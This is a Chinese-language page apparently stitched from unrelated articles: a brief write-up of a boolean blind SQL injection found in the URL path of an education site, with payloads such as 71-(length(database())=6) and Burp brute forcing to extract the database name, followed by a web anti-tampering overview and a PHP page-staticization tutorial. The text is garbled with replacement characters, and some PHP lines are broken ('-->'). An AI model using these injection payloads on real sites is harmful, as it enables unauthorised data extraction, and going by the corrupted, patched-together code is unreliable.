眾號(hào):白帽子左一
專注分享滲透經(jīng)驗(yàn),干貨技巧....
前言
最近工作繁忙���,許久沒有挖洞�����,打開度娘�,凡事隨緣�����,偶米頭發(fā)~~(⊙﹏⊙)
涉及技能點(diǎn)
- SQL注入基礎(chǔ)原理
- 盲注常用函數(shù)及思路
- burpsuite基礎(chǔ)知識(shí)
過程記錄
1.發(fā)現(xiàn)
在翻閱一EDU站點(diǎn)時(shí)�����,發(fā)現(xiàn)路徑中帶有明顯的數(shù)字參數(shù)
好像與我們平時(shí)習(xí)慣的xxx.php?id=不同呃
2.嘗試注入
按照以往習(xí)慣,先用order by探探底�����,結(jié)果翻車了…應(yīng)該有自定義邏輯在過濾敏感關(guān)鍵詞�����。
繼續(xù)努力�,峰回路轉(zhuǎn),耶~~~�����!
構(gòu)造boolen等式時(shí)能夠被帶入查詢語句并顯示不同效果
當(dāng)條件不符合時(shí)�����,71-false=71,顯示71.html���,無數(shù)據(jù)
http://EDU_SITE/.../..._id/71-false.html
=> SELECT ..FROM .. WHERE ... AND _id=71-false
而當(dāng)條件符合時(shí),71-true=70�����,顯示70.html�,有數(shù)據(jù)
http://EDU_SITE/.../..._id/71-true.html
=> SELECT ..FROM .. WHERE ... AND _id=71-true
3.確定攻擊方式,獲取數(shù)據(jù)進(jìn)行驗(yàn)證
獲取用戶名長度
http://EDU_SITE/.../..._id/71-(length(user())=12).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)
獲取數(shù)據(jù)庫長度
http://EDU_SITE/.../..._id/71-(length(database())=6).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)
嘗試用burpsuite的clusterboom模式對(duì)database進(jìn)行爆破
其中參數(shù)1 為位數(shù)�,參數(shù)2 為可能出現(xiàn)的字符明文
獲得最終database()=db_cms
總結(jié)
在嘗試sql注入的時(shí)候�����,往往過分關(guān)注get傳參或者post傳參而忽略了URL中自帶的注入點(diǎn),有時(shí)候一些明顯的數(shù)字型參數(shù)也能夠帶入payload
多嘗試,多總結(jié)�,祝各位也都收獲滿滿~~�!
公司新需求���,網(wǎng)頁防篡改�,這個(gè)如何實(shí)現(xiàn)?(別走開�,這里有你不知道的知識(shí)點(diǎn))
## 引言:網(wǎng)頁防篡改技術(shù)的重要性
在Web開發(fā)領(lǐng)域,保護(hù)網(wǎng)站內(nèi)容不受非法篡改是一項(xiàng)至關(guān)重要的任務(wù)���,尤其對(duì)于涉及交易、金融���、政務(wù)等重要信息的網(wǎng)站來說,網(wǎng)頁防篡改更是關(guān)乎數(shù)據(jù)安全與用戶信任的基石���。本文將深入淺出地介紹網(wǎng)頁防篡改技術(shù)及其具體實(shí)現(xiàn)方法,讓你在滿足公司新需求的同時(shí)�,掌握更多鮮為人知的技術(shù)知識(shí)點(diǎn)���。
### **一�����、網(wǎng)頁篡改的主要手段與危害**
1. **靜態(tài)文件篡改**:攻擊者通過非法途徑修改服務(wù)器上的HTML、CSS、JavaScript等靜態(tài)文件,植入惡意代碼。
2. **動(dòng)態(tài)內(nèi)容注入**:利用漏洞篡改數(shù)據(jù)庫內(nèi)容���,影響網(wǎng)頁動(dòng)態(tài)加載的信息。
3. **中間人攻擊**:在網(wǎng)絡(luò)傳輸過程中篡改數(shù)據(jù)包內(nèi)容�����。
### **二�����、網(wǎng)頁防篡改的基本原理與策略**
#### **1. 文件完整性校驗(yàn)**
- **MD5/SHA校驗(yàn)**:對(duì)靜態(tài)文件進(jìn)行MD5或SHA散列值計(jì)算���,存儲(chǔ)在數(shù)據(jù)庫或配置文件中���,每次加載文件時(shí)驗(yàn)證散列值是否一致���。
```javascript
// 偽代碼示例
function verifyFileIntegrity(fileUrl, expectedHash) {
const actualHash = calculateFileHash(fileUrl);
return actualHash === expectedHash;
}
function calculateFileHash(fileUrl) {
// 實(shí)際中需要通過HTTP請(qǐng)求獲取文件內(nèi)容并計(jì)算哈希值
// 此處僅為示例,實(shí)際計(jì)算哈希值的代碼省略
}
```
#### **2. HTTPS加密傳輸**
- **SSL/TLS協(xié)議**:?jiǎn)⒂肏TTPS加密傳輸,有效防止中間人攻擊篡改傳輸內(nèi)容。
#### **3. 動(dòng)態(tài)內(nèi)容簽名**
- **JWT(JSON Web Tokens)**:對(duì)動(dòng)態(tài)生成的內(nèi)容進(jìn)行簽名�,客戶端驗(yàn)證簽名的有效性�。
```javascript
// Node.js示例�,使用jsonwebtoken庫生成簽名
const jwt = require('jsonwebtoken');
function signDynamicContent(content) {
const secret = 'your-secret-key';
const token = jwt.sign({ content }, secret, { expiresIn: '1h' });
return token;
}
// 客戶端驗(yàn)證簽名
jwt.verify(token, 'your-secret-key', (err, decoded) => {
if (!err) {
const signedContent = decoded.content;
// 使用簽名有效的動(dòng)態(tài)內(nèi)容
} else {
// 處理簽名無效的情況
}
});
```
### **三、服務(wù)器端防護(hù)措施**
1. **文件系統(tǒng)監(jiān)控**:對(duì)服務(wù)器文件系統(tǒng)進(jìn)行實(shí)時(shí)監(jiān)控�����,一旦檢測(cè)到文件改動(dòng)立即報(bào)警。
2. **Web應(yīng)用防火墻(WAF)**:部署WAF,對(duì)輸入輸出流量進(jìn)行過濾���,阻止惡意篡改行為。
3. **源碼混淆與壓縮**:通過混淆和壓縮技術(shù)降低源碼可讀性,加大篡改難度�。
### **四���、前端防御手段**
1. **Content Security Policy(CSP)**:制定嚴(yán)格的CSP規(guī)則�����,限制加載外部資源和執(zhí)行內(nèi)聯(lián)腳本。
```html
<meta http-equiv="Content-Security-Policy"
content="default-src 'self'; script-src 'self' https://trusted-cdn.com;">
```
2. **Subresource Integrity(SRI)**:對(duì)加載的外部腳本���、樣式表等資源進(jìn)行完整性校驗(yàn)。
```html
<link rel="stylesheet" href="styles.css"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYlxyRH+c1rjSmjgdLyeR8Q=="
crossorigin="anonymous">
```
### **五�����、綜合解決方案:數(shù)字簽名與時(shí)間戳**
**1. 數(shù)字簽名**:通過公鑰/私鑰體系���,由服務(wù)器對(duì)靜態(tài)資源進(jìn)行數(shù)字簽名�����,客戶端驗(yàn)證簽名有效性���。
**2. 時(shí)間戳**:附加資源的時(shí)間戳信息,一旦文件被篡改�����,客戶端通過比對(duì)時(shí)間戳判斷資源是否最新���。
### **結(jié)語**
網(wǎng)頁防篡改是一項(xiàng)系統(tǒng)的安全工程�����,需要從前端到后端�,從傳輸層到應(yīng)用層全方位進(jìn)行防護(hù)�����。只有深入了解各種技術(shù)手段�,并結(jié)合實(shí)際業(yè)務(wù)需求進(jìn)行合理配置���,才能確保網(wǎng)頁內(nèi)容的安全性和穩(wěn)定性�。在實(shí)施過程中,我們不僅要關(guān)注技術(shù)細(xì)節(jié)���,更要重視安全意識(shí)的培養(yǎng)和規(guī)范化的安全運(yùn)維流程,共同筑起網(wǎng)絡(luò)安全的堅(jiān)固防線�。
著網(wǎng)站的內(nèi)容的增多和用戶訪問量的增多���,無可避免的是網(wǎng)站加載會(huì)越來越慢���,受限于帶寬和服務(wù)器同一時(shí)間的請(qǐng)求次數(shù)的限制���,我們往往需要在此時(shí)對(duì)我們的網(wǎng)站進(jìn)行代碼優(yōu)化和服務(wù)器配置的優(yōu)化�。
一般情況下會(huì)從以下方面來做優(yōu)化
1�����、動(dòng)態(tài)頁面靜態(tài)化
2、優(yōu)化數(shù)據(jù)庫
3���、使用負(fù)載均衡
4、使用緩存
5�、使用CDN加速
現(xiàn)在很多網(wǎng)站在建設(shè)的時(shí)候都要進(jìn)行靜態(tài)化的處理���,為什么網(wǎng)站要進(jìn)行靜態(tài)化處理呢�?我們都知道純靜態(tài)網(wǎng)站是所有的網(wǎng)頁都是獨(dú)立的一個(gè)html頁面,當(dāng)我們?cè)L問的時(shí)候不需要經(jīng)過數(shù)據(jù)的處理直接就能讀取到文件�,訪問速度就可想而知了�����,而其對(duì)于搜索引擎而言也是非常友好的一個(gè)方式。
純靜態(tài)網(wǎng)站在網(wǎng)站中是怎么實(shí)現(xiàn)的�����?
純靜態(tài)的制作技術(shù)是需要先把網(wǎng)站的頁面總結(jié)出來���,分為多少個(gè)樣式�,然后把這些頁面做成模板,生成的時(shí)候需要先讀取源文件然后生成獨(dú)立的以.html結(jié)尾的頁面文件�,所以說純靜態(tài)網(wǎng)站需要更大的空間�����,不過其實(shí)需要的空間也不會(huì)大多少的,尤其是對(duì)于中小型企業(yè)網(wǎng)站來說�,從技術(shù)上來講�����,大型網(wǎng)站想要全站實(shí)現(xiàn)純靜態(tài)化是比較困難的���,生成的時(shí)間也太過于長了�。不過中小型網(wǎng)站還是做成純靜態(tài)的比較,這樣做的優(yōu)點(diǎn)是很多的�。
而動(dòng)態(tài)網(wǎng)站又是怎么進(jìn)行靜態(tài)處理的�?
頁面靜態(tài)化是指將動(dòng)態(tài)頁面變成html/htm靜態(tài)頁面�。動(dòng)態(tài)頁面一般由asp,php,jsp,.net等程序語言編寫而成,非常便于管理�����。但是訪問網(wǎng)頁時(shí)還需要程序先處理一遍�����,所以導(dǎo)致訪問速度相對(duì)較慢�。而靜態(tài)頁面訪問速度快�����,卻又不便于管理���。那么動(dòng)態(tài)頁面靜態(tài)化即可以將兩種頁面的好處集中到一起�����。
靜態(tài)處理后又給網(wǎng)站帶來了哪些好處?
1、靜態(tài)頁面相對(duì)于動(dòng)態(tài)頁面更容易被搜索引擎收錄�。
2���、訪問靜態(tài)頁面不需要經(jīng)過程序處理�����,因此可以提高運(yùn)行速度�。
3、減輕服務(wù)器負(fù)擔(dān)。
4���、HTML頁面不會(huì)受Asp相關(guān)漏洞的影響。
靜態(tài)處理后的網(wǎng)站相對(duì)沒有靜態(tài)化處理的網(wǎng)站來講還比較有安全性,因?yàn)殪o態(tài)網(wǎng)站是不會(huì)是黑客攻擊的首選對(duì)象,因?yàn)楹诳驮诓恢滥愫笈_(tái)系統(tǒng)的情況下�����,黑 客從前臺(tái)的靜態(tài)頁面很難進(jìn)行攻擊�����。同時(shí)還具有一定的穩(wěn)定性���,比如數(shù)據(jù)庫或者網(wǎng)站的程序出了問題���,他不會(huì)干擾到靜態(tài)處理后的頁面���,不會(huì)因?yàn)槌绦蚧驍?shù)據(jù)影響而 打不開頁面���。
搜索引擎蜘蛛程序更喜歡這樣的網(wǎng)址���,也可以減輕蜘蛛程序的工作負(fù)擔(dān)�,雖然有的人會(huì)認(rèn)為現(xiàn)在搜索引擎完全有能力去抓取和識(shí)別動(dòng)態(tài)的網(wǎng)址,在這里還是建議大家能做成靜態(tài)的盡量做成靜態(tài)網(wǎng)址。
下面我們主要來講一講頁面靜態(tài)化這個(gè)概念�,希望對(duì)你有所幫助�����!
什么是HTML靜態(tài)化:
常說的頁面靜態(tài)化分為兩種,一種是偽靜態(tài)�����,即url 重寫�,一種是真靜態(tài)化�。
在PHP網(wǎng)站開發(fā)中為了網(wǎng)站推廣和SEO等需要,需要對(duì)網(wǎng)站進(jìn)行全站或局部靜態(tài)化處理,PHP生成靜態(tài)HTML頁面有多種方法,比如利用PHP模板、緩存等實(shí)現(xiàn)頁面靜態(tài)化�����。
PHP靜態(tài)化的簡(jiǎn)單理解就是使網(wǎng)站生成頁面以靜態(tài)HTML的形式展現(xiàn)在訪客面前�,PHP靜態(tài)化分純靜態(tài)化和偽靜態(tài)化,兩者的區(qū)別在于PHP生成靜態(tài)頁面的處理機(jī)制不同�����。
PHP偽靜態(tài):利用Apache mod_rewrite實(shí)現(xiàn)URL重寫的方法�����。
HTML靜態(tài)化的好處:
一���、減輕服務(wù)器負(fù)擔(dān)���,瀏覽網(wǎng)頁無需調(diào)用系統(tǒng)數(shù)據(jù)庫���。
二���、有利于搜索引擎優(yōu)化SEO�,Baidu�、Google都會(huì)優(yōu)先收錄靜態(tài)頁面,不僅被收錄的快還收錄的全�����;
三���、加快頁面打開速度�����,靜態(tài)頁面無需連接數(shù)據(jù)庫打開速度較動(dòng)態(tài)頁面有明顯提高;
四�����、網(wǎng)站更安全�,HTML頁面不會(huì)受php程序相關(guān)漏洞的影響;觀看一下大一點(diǎn)的網(wǎng)站基本全是靜態(tài)頁面�����,而且可以減少攻擊���,防sql注入�����。數(shù)據(jù)庫出錯(cuò)時(shí)�,不影響網(wǎng)站正常訪問。
五���、數(shù)據(jù)庫出錯(cuò)時(shí),不影響網(wǎng)站的正常訪問���。
最主要是可以增加訪問速度,減輕服務(wù)器負(fù)擔(dān),當(dāng)數(shù)據(jù)量有幾萬,幾十萬或是更多的時(shí)候你知道哪個(gè)更快了. 而且還容易被搜索引擎找到���。生成html文章雖操作上麻煩些,程序上繁雜些�,但為了更利于搜索�,為了速度更快些�,更安全�����,這些犧牲還是值得的�。
實(shí)現(xiàn)HTML靜態(tài)化的策略與實(shí)例講解:
基本方式
file_put_contents()函數(shù)
使用php內(nèi)置緩存機(jī)制實(shí)現(xiàn)頁面靜態(tài)化 —output-bufferring.
方法1:利用PHP模板生成靜態(tài)頁面
PHP模板實(shí)現(xiàn)靜態(tài)化非常方便���,比如安裝和使用PHP Smarty實(shí)現(xiàn)網(wǎng)站靜態(tài)化。
在使用Smarty的情況下,也可以實(shí)現(xiàn)頁面靜態(tài)化。下面先簡(jiǎn)單說一下使用Smarty時(shí)通常動(dòng)態(tài)讀取的做法�����。
一般分這幾步:
1�、通過URL傳遞一個(gè)參數(shù)(ID);
2���、然后根據(jù)此ID查詢數(shù)據(jù)庫;
3、取得數(shù)據(jù)后根據(jù)需要修改顯示內(nèi)容;
4�����、assign需要顯示的數(shù)據(jù);
5、display模板文件�。
Smarty靜態(tài)化過程只需要在上述過程中添加兩個(gè)步驟���。
第一:在1之前使用 ob_start() 打開緩沖區(qū)���。
第二:在5之后使用 ob_get_contents() 獲取內(nèi)存未輸出內(nèi)容�,然后使用fwrite()將內(nèi)容寫入目標(biāo)html文件。
根據(jù)上述描述�����,此過程是在網(wǎng)站前臺(tái)實(shí)現(xiàn)的,而內(nèi)容管理(添加�����、修改、刪除)通常是在后臺(tái)進(jìn)行�,為了能有效利用上述過程�����,可以使用一點(diǎn)小手段�����,那就是Header()�。具體過程是這樣的:在添加、修改程序完成之后,使用Header() 跳到前臺(tái)讀取,這樣可以實(shí)現(xiàn)頁面HTML化�,然后在生成html后再跳回后臺(tái)管理側(cè)�����,而這兩個(gè)跳轉(zhuǎn)過程是不可見的。
方法2:使用PHP文件讀寫功能生成靜態(tài)頁面
<?php
$out1 = "<html><head><title>PHP網(wǎng)站靜態(tài)化教程</title></head><body>歡迎訪問PHP網(wǎng)站開發(fā)www.startphp.cn,本文主要介紹PHP網(wǎng)站頁面靜態(tài)化的方法</body></html>";
$fp = fopen("leapsoulcn.html","w");
if(!$fp)
{
echo "System Error";
exit();
}
else
{
fwrite($fp,$out1);
fclose($fp);
echo "Success";
}
?>
方法3:使用PHP輸出控制函數(shù)(Output Control)/ob緩存機(jī)制生成靜態(tài)頁面
輸出控制函數(shù)(Output Control)也就是使用和控制緩存來生成靜態(tài)HTML頁面�,也會(huì)使用到PHP文件讀寫函數(shù)�����。
比如某個(gè)商品的動(dòng)態(tài)詳情頁地址是: http://xxx.com?goods.php?gid=112
那么這里我們根據(jù)這個(gè)地址讀取一次這個(gè)詳情頁的內(nèi)容���,然后保存為靜態(tài)頁���,下次有人訪問這個(gè)商品詳情頁動(dòng)態(tài)地址時(shí),我們可以直接把已生成好的對(duì)應(yīng)靜態(tài)內(nèi)容文件輸出出來�����。
PHP生成靜態(tài)頁面實(shí)例代碼 1
<?php
ob_start();
echo "<html>".
"<head>".
"<title>PHP網(wǎng)站靜態(tài)化教程</title>".
"</head>".
"<body>歡迎訪問腳本之家,本文主要介紹PHP網(wǎng)站頁面靜態(tài)化的方法</body>".
"</html>";
$out1 = ob_get_contents();
ob_end_clean();
$fp = fopen("leapsoulcn.html","w");
if(!$fp)
{
echo "System Error";
exit();
}
else
{
fwrite($fp,$out1);
fclose($fp);
echo "Success";
}
?>
PHP生成靜態(tài)頁面實(shí)例代碼 2
<?php
$gid = $_GET['gid']+0;//商品id
$goods_statis_file = "goods_file_".$gid.".html";//對(duì)應(yīng)靜態(tài)頁文件
$expr = 3600*24*10;//靜態(tài)文件有效期�����,十天
if(file_exists($goods_statis_file)){
$file_ctime =filectime($goods_statis_file);//文件創(chuàng)建時(shí)間
if($file_ctime+$expr-->time()){//如果沒過期
echo file_get_contents($goods_statis_file);//輸出靜態(tài)文件內(nèi)容
exit;
}else{//如果已過期
unlink($goods_statis_file);//刪除過期的靜態(tài)頁文件
ob_start();
//從數(shù)據(jù)庫讀取數(shù)據(jù),并賦值給相關(guān)變量
//include ("xxx.html");//加載對(duì)應(yīng)的商品詳情頁模板
$content = ob_get_contents();//把詳情頁內(nèi)容賦值給$content變量
file_put_contents($goods_statis_file,$content);//寫入內(nèi)容到對(duì)應(yīng)靜態(tài)文件中
ob_end_flush();//輸出商品詳情頁信息
}
}else{
ob_start();
//從數(shù)據(jù)庫讀取數(shù)據(jù)�,并賦值給相關(guān)變量
//include ("xxx.html");//加載對(duì)應(yīng)的商品詳情頁模板
$content = ob_get_contents();//把詳情頁內(nèi)容賦值給$content變量
file_put_contents($goods_statis_file,$content);//寫入內(nèi)容到對(duì)應(yīng)靜態(tài)文件中
ob_end_flush();//輸出商品詳情頁信息
}
?>
我們知道使用PHP進(jìn)行網(wǎng)站開發(fā),一般執(zhí)行結(jié)果直接輸出到游覽器�����,為了使用PHP生成靜態(tài)頁面,就需要使用輸出控制函數(shù)控制緩存區(qū)�����,以便獲取緩存區(qū)的內(nèi)容�����,然后再輸出到靜態(tài)HTML頁面文件中以實(shí)現(xiàn)網(wǎng)站靜態(tài)化���。
PHP生成靜態(tài)頁面的思路為:首先開啟緩存���,然后輸出了HTML內(nèi)容(你也可以通過include將HTML內(nèi)容以文件形式包含進(jìn)來),之后獲取緩存中的內(nèi)容�,清空緩存后通過PHP文件讀寫函數(shù)將緩存內(nèi)容寫入到靜態(tài)HTML頁面文件中�。
獲得輸出的緩存內(nèi)容以生成靜態(tài)HTML頁面的過程需要使用三個(gè)函數(shù):ob_start()、ob_get_contents()�����、ob_end_clean()�����。
知識(shí)點(diǎn):
1�、ob_start函數(shù)一般主要是用來開啟緩存�,注意使用ob_start之前不能有任何輸出�����,如空格�����、字符等�。
2、ob_get_contents函數(shù)主要用來獲取緩存中的內(nèi)容以字符串形式返回,注意此函數(shù)必須在ob_end_clean函數(shù)之前調(diào)用���,否則獲取不到緩存內(nèi)容���。
3�����、ob_end_clean函數(shù)主要是清空緩存中的內(nèi)容并關(guān)閉緩存�����,成功則返回True�����,失敗則返回False
方法4:使用nosql從內(nèi)存中讀取內(nèi)容(其實(shí)這個(gè)已經(jīng)不算靜態(tài)化了而是緩存);
以memcache為例:
<?php
$gid = $_GET['gid']+0;//商品id
$goods_statis_content = "goods_content_".$gid;//對(duì)應(yīng)鍵
$expr = 3600*24*10;//有效期,十天
$mem = new Memcache;
$mem--->connect('memcache_host', 11211);
$mem_goods_content = $mem->get($goods_statis_content);
if($mem_goods_content){
echo $mem_goods_content;
}else{
ob_start();
//從數(shù)據(jù)庫讀取數(shù)據(jù),并賦值給相關(guān)變量
//include ("xxx.html");//加載對(duì)應(yīng)的商品詳情頁模板
$content = ob_get_contents();//把詳情頁內(nèi)容賦值給$content變量
$mem->add($goods_statis_content,$content, false, $expr);
ob_end_flush();//輸出商品詳情頁信息
}
?>
memcached是鍵值一一對(duì)應(yīng)�����,key默認(rèn)最大不能超過128個(gè)字節(jié)���,value默認(rèn)大小是1M�,因此1M大小滿足大多數(shù)網(wǎng)頁大小的存儲(chǔ)�。
舉兩個(gè)例子�,怎么樣寫好代碼
最經(jīng)典的算法�����,獻(xiàn)給正在面試道路上的你
如果你現(xiàn)在在面試PHP的道路上���,看看面試基礎(chǔ)題吧
